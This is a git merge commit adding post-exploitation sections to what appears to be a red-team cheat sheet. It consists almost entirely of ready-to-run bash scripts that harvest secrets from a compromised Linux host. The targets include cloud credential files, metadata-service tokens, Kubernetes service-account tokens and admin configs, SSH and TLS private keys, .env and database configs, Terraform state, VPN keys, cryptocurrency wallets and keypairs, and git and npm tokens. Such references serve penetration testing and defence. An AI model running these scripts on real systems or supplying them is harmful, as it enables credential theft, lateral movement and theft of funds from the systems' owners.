Merge pull request #11 from RoseSecurity/add-trivy-ttps

chore: add trivy ttps

Author: RoseSecurity

Cloud.md

@@ -17,6 +17,11 @@
 - [Go Environment Variable Enumeration (T1082)](#go-environment-variable-enumeration-t1082)
 - [Jira (T1087)](#jira-t1087)
 - [Pentesting Kafka (T1046)](#pentesting-kafka-t1046)
+- [Post-Exploitation Cloud Credential Harvesting (T1552.001)](#post-exploitation-cloud-credential-harvesting-t1552001)
+- [IMDS and Container Credential Theft (T1552.005)](#imds-and-container-credential-theft-t1552005)
+- [Kubernetes Service Account Token Theft (T1552.007)](#kubernetes-service-account-token-theft-t1552007)
+- [Docker Registry Credential Harvesting (T1552.001)](#docker-registry-credential-harvesting-t1552001)
+- [CI/CD and IaC Secret Harvesting (T1552.001)](#cicd-and-iac-secret-harvesting-t1552001)
 
 ---
 
@@ -709,3 +714,133 @@ Save messages for offline analysis;
 ```sh
 kcat -b target.com:9092 -t AlertNotifications -C -J | jq . > messages.json
 ```
+
+## Post-Exploitation Cloud Credential Harvesting (T1552.001)
+
+After gaining access to a host, cloud provider credentials are often stored in well-known file paths. The following enumerates credential files across AWS, GCP, and Azure for all users on the system:
+
+```bash
+# AWS credentials and config
+for home in /home/* /root; do
+  for f in "$home/.aws/credentials" "$home/.aws/config"; do
+    [ -f "$f" ] && echo "=== $f ===" && cat "$f"
+  done
+done
+
+# AWS credential environment variables
+env | grep -E "^AWS_"
+
+# GCP application default credentials and service account keys
+for home in /home/* /root; do
+  find "$home/.config/gcloud" -type f 2>/dev/null | while read -r f; do
+    echo "=== $f ===" && cat "$f"
+  done
+done
+cat "$GOOGLE_APPLICATION_CREDENTIALS" 2>/dev/null
+env | grep -iE "(GOOGLE|GCLOUD)"
+
+# Azure credential files
+for home in /home/* /root; do
+  find "$home/.azure" -type f 2>/dev/null | while read -r f; do
+    echo "=== $f ===" && cat "$f"
+  done
+done
+env | grep -i AZURE
+```
+
+## IMDS and Container Credential Theft (T1552.005)
+
+Cloud instance metadata services (IMDS) and container credential endpoints expose temporary credentials. These are commonly targeted after gaining code execution inside a cloud workload:
+
+```bash
+# AWS EC2 IMDS v1 - List available IAM roles then fetch temporary credentials
+ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
+curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
+
+# AWS ECS container credentials (uses task role URI from environment)
+curl -s "http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}"
+
+# GCP - Fetch access token from metadata server
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
+
+# Azure IMDS - Fetch managed identity token
+curl -s -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
+```
+
+## Kubernetes Service Account Token Theft (T1552.007)
+
+Kubernetes pods are provisioned with service account tokens that can be used to authenticate to the API server. Common mount paths vary between container runtimes:
+
+```bash
+# Standard service account token mount paths
+cat /var/run/secrets/kubernetes.io/serviceaccount/token
+cat /run/secrets/kubernetes.io/serviceaccount/token
+
+# Service account CA certificate and namespace
+cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
+
+# Kubeconfig files across user home directories
+for home in /home/* /root; do
+  [ -f "$home/.kube/config" ] && echo "=== $home/.kube/config ===" && cat "$home/.kube/config"
+done
+
+# Cluster admin and component configs
+for f in /etc/kubernetes/admin.conf \
+         /etc/kubernetes/kubelet.conf \
+         /etc/kubernetes/controller-manager.conf \
+         /etc/kubernetes/scheduler.conf; do
+  [ -f "$f" ] && echo "=== $f ===" && cat "$f"
+done
+
+# Enumerate all mounted secrets
+find /var/secrets /run/secrets -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f" 2>/dev/null
+done
+
+# Dump secrets via kubectl if accessible
+kubectl get secrets --all-namespaces -o json 2>/dev/null
+```
+
+## Docker Registry Credential Harvesting (T1552.001)
+
+Docker stores registry authentication tokens in config files that can be used to pull or push images to private registries:
+
+```bash
+# User Docker configs
+for home in /home/* /root; do
+  [ -f "$home/.docker/config.json" ] && echo "=== $home/.docker/config.json ===" && cat "$home/.docker/config.json"
+done
+
+# Kaniko builder credentials (common in CI/CD pipelines)
+cat /kaniko/.docker/config.json 2>/dev/null
+```
+
+## CI/CD and IaC Secret Harvesting (T1552.001)
+
+Terraform state files, variable files, and CI/CD configuration files frequently contain plaintext credentials, API keys, and infrastructure secrets:
+
+```bash
+# Terraform variable files (may contain cloud credentials, database passwords)
+find / -name "*.tfvars" -type f 2>/dev/null -exec sh -c 'echo "=== {} ===" && cat "{}"' \;
+
+# Terraform state files (contain full resource attributes including secrets)
+find / -name "terraform.tfstate" -type f 2>/dev/null -exec sh -c 'echo "=== {} ===" && cat "{}"' \;
+
+# CI/CD configuration files
+for f in .gitlab-ci.yml .travis.yml Jenkinsfile .drone.yml; do
+  [ -f "$f" ] && echo "=== $f ===" && cat "$f"
+done
+
+# Ansible configuration (may reference vault passwords)
+cat ansible.cfg 2>/dev/null
+
+# Helm chart values (may contain secrets)
+for home in /home/* /root; do
+  find "$home/.helm" -type f 2>/dev/null | while read -r f; do
+    echo "=== $f ===" && cat "$f"
+  done
+done
+```

Linux.md

@@ -87,6 +87,14 @@
 - [Taking Apart URL Shorteners with cURL (T1082)](#taking-apart-url-shorteners-with-curl-t1082)
 - [Email Spoofing PHP (T1566)](#email-spoofing-php-t1566)
 - [Linux SIEM Bypass (T1006)](#linux-siem-bypass-t1006)
+- [SSH Key and Host Key Harvesting (T1552.004)](#ssh-key-and-host-key-harvesting-t1552004)
+- [Environment File Credential Harvesting (T1552.001)](#environment-file-credential-harvesting-t1552001)
+- [Database Credential File Harvesting (T1552.001)](#database-credential-file-harvesting-t1552001)
+- [TLS/SSL Private Key Harvesting (T1552.004)](#tlsssl-private-key-harvesting-t1552004)
+- [VPN Configuration Harvesting (T1552.001)](#vpn-configuration-harvesting-t1552001)
+- [Cryptocurrency Wallet Harvesting (T1005)](#cryptocurrency-wallet-harvesting-t1005)
+- [Webhook and API Key Discovery (T1552.001)](#webhook-and-api-key-discovery-t1552001)
+- [Application Credential File Harvesting (T1552.001)](#application-credential-file-harvesting-t1552001)
 
 ---
 
@@ -1835,3 +1843,212 @@ sys:*:19436:0:99999:7:::
 sync:*:19436:0:99999:7:::
 games:*:19436:0:99999:7:::
 ```
+
+## SSH Key and Host Key Harvesting (T1552.004)
+
+Comprehensive SSH credential harvesting across all user home directories and system host keys:
+
+```bash
+# Harvest user SSH private keys, configs, and known hosts
+for home in /home/* /root; do
+  for f in .ssh/id_rsa .ssh/id_ed25519 .ssh/id_ecdsa .ssh/id_dsa \
+           .ssh/authorized_keys .ssh/known_hosts .ssh/config; do
+    [ -f "$home/$f" ] && echo "=== $home/$f ===" && cat "$home/$f"
+  done
+  # Catch non-standard key filenames
+  find "$home/.ssh" -type f 2>/dev/null | while read -r f; do
+    echo "=== $f ===" && cat "$f"
+  done
+done
+
+# Harvest SSH host private keys (requires root)
+find /etc/ssh -name "ssh_host*_key" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+```
+
+## Environment File Credential Harvesting (T1552.001)
+
+Environment files commonly contain API keys, database connection strings, and cloud credentials in plaintext. Searching the filesystem for `.env` variants:
+
+```bash
+# Check common relative paths from current working directory
+for f in .env .env.local .env.production .env.development .env.staging .env.test; do
+  for d in . .. ../..; do
+    [ -f "$d/$f" ] && echo "=== $d/$f ===" && cat "$d/$f"
+  done
+done
+
+# Check system-wide environment files
+cat /etc/environment 2>/dev/null
+cat /app/.env 2>/dev/null
+
+# Recursive search across common application directories
+find /home /root /opt /srv /var/www /app /data /var/lib /tmp \
+  -maxdepth 6 -name ".env*" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+```
+
+## Database Credential File Harvesting (T1552.001)
+
+Database clients store credentials in dotfiles and system-wide configs:
+
+```bash
+# PostgreSQL password files
+for home in /home/* /root; do
+  [ -f "$home/.pgpass" ] && echo "=== $home/.pgpass ===" && cat "$home/.pgpass"
+done
+cat /var/lib/postgresql/.pgpass 2>/dev/null
+
+# MySQL/MariaDB credentials
+for home in /home/* /root; do
+  [ -f "$home/.my.cnf" ] && echo "=== $home/.my.cnf ===" && cat "$home/.my.cnf"
+done
+cat /etc/mysql/my.cnf 2>/dev/null
+
+# Redis configuration (may contain requirepass)
+cat /etc/redis/redis.conf 2>/dev/null | grep -i "requirepass\|masterauth"
+
+# MongoDB RC files
+for home in /home/* /root; do
+  [ -f "$home/.mongorc.js" ] && echo "=== $home/.mongorc.js ===" && cat "$home/.mongorc.js"
+done
+
+# LDAP configuration (may contain bind credentials)
+for f in /etc/ldap/ldap.conf /etc/openldap/ldap.conf /etc/ldap.conf \
+         /etc/ldap/slapd.conf /etc/openldap/slapd.conf; do
+  [ -f "$f" ] && echo "=== $f ===" && cat "$f"
+done
+
+# Database credential environment variables
+env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"
+```
+
+## TLS/SSL Private Key Harvesting (T1552.004)
+
+TLS private keys enable man-in-the-middle attacks against encrypted traffic or impersonation of services:
+
+```bash
+# System SSL private keys
+find /etc/ssl/private -name "*.key" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+
+# Let's Encrypt certificates and private keys
+find /etc/letsencrypt -name "*.pem" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+
+# Broad search for key material across the filesystem
+find /home /root /opt /srv /var/www /app /data /var/lib /tmp \
+  -maxdepth 5 -type f \( -name "*.pem" -o -name "*.key" -o -name "*.p12" -o -name "*.pfx" \) \
+  2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+```
+
+## VPN Configuration Harvesting (T1552.001)
+
+VPN configurations contain pre-shared keys and endpoint information that enable network pivoting:
+
+```bash
+# WireGuard configurations (contain private keys and peer info)
+find /etc/wireguard -name "*.conf" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+
+# Dump active WireGuard interface configurations
+wg showconf all 2>/dev/null
+```
+
+## Cryptocurrency Wallet Harvesting (T1005)
+
+Cryptocurrency node configurations contain RPC credentials and wallet files contain private keys:
+
+```bash
+# Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero configs
+for home in /home/* /root; do
+  for coin in .bitcoin/bitcoin.conf .litecoin/litecoin.conf .dogecoin/dogecoin.conf \
+              .zcash/zcash.conf .dashcore/dash.conf .ripple/rippled.cfg \
+              .bitmonero/bitmonero.conf; do
+    [ -f "$home/$coin" ] && echo "=== $home/$coin ===" && cat "$home/$coin"
+  done
+done
+
+# Bitcoin wallet files
+find /home /root -path "*/.bitcoin/wallet*.dat" -type f 2>/dev/null
+
+# Ethereum keystore files (encrypted private keys)
+find /home /root -path "*/.ethereum/keystore/*" -type f 2>/dev/null | while read -r f; do
+  echo "=== $f ===" && cat "$f"
+done
+
+# Cardano signing and verification keys
+find /home /root -path "*/.cardano/*" \( -name "*.skey" -o -name "*.vkey" \) -type f 2>/dev/null
+
+# Solana keypairs
+for home in /home/* /root; do
+  find "$home/.config/solana" -type f 2>/dev/null | while read -r f; do
+    echo "=== $f ===" && cat "$f"
+  done
+done
+for d in /home/sol /home/solana /opt/solana /solana /app /data; do
+  [ -f "$d/validator-keypair.json" ] && echo "=== $d/validator-keypair.json ===" && cat "$d/validator-keypair.json"
+done
+
+# Search current directory for keypair and wallet JSON files
+find . -maxdepth 8 -type f \( -name "id.json" -o -name "keypair.json" -o -name "*-keypair.json" \
+  -o \( -name "wallet*.json" \) \) 2>/dev/null
+
+# RPC credentials in cryptocurrency configs
+grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null
+```
+
+## Webhook and API Key Discovery (T1552.001)
+
+Searching the filesystem for hardcoded webhook URLs and API keys:
+
+```bash
+# Slack and Discord webhook URLs
+grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20
+
+# API keys and tokens in configuration files
+grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . \
+  --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" \
+  2>/dev/null | head -50
+```
+
+## Application Credential File Harvesting (T1552.001)
+
+Various applications store credentials in dotfiles:
+
+```bash
+for home in /home/* /root; do
+  # Git credentials (plaintext username:password)
+  for f in .git-credentials .gitconfig; do
+    [ -f "$home/$f" ] && echo "=== $home/$f ===" && cat "$home/$f"
+  done
+
+  # Package manager and service tokens
+  for f in .npmrc .vault-token .netrc; do
+    [ -f "$home/$f" ] && echo "=== $home/$f ===" && cat "$home/$f"
+  done
+
+  # Mail and FTP client configs
+  for f in .lftp/rc .msmtprc; do
+    [ -f "$home/$f" ] && echo "=== $home/$f ===" && cat "$home/$f"
+  done
+
+  # Shell and application history files
+  for hist in .bash_history .zsh_history .sh_history \
+              .mysql_history .psql_history .rediscli_history; do
+    [ -f "$home/$hist" ] && echo "=== $home/$hist ===" && cat "$home/$hist"
+  done
+done
+
+# System-level mail and service configs
+for f in /etc/postfix/sasl_passwd /etc/msmtprc; do
+  [ -f "$f" ] && echo "=== $f ===" && cat "$f"
+done
+```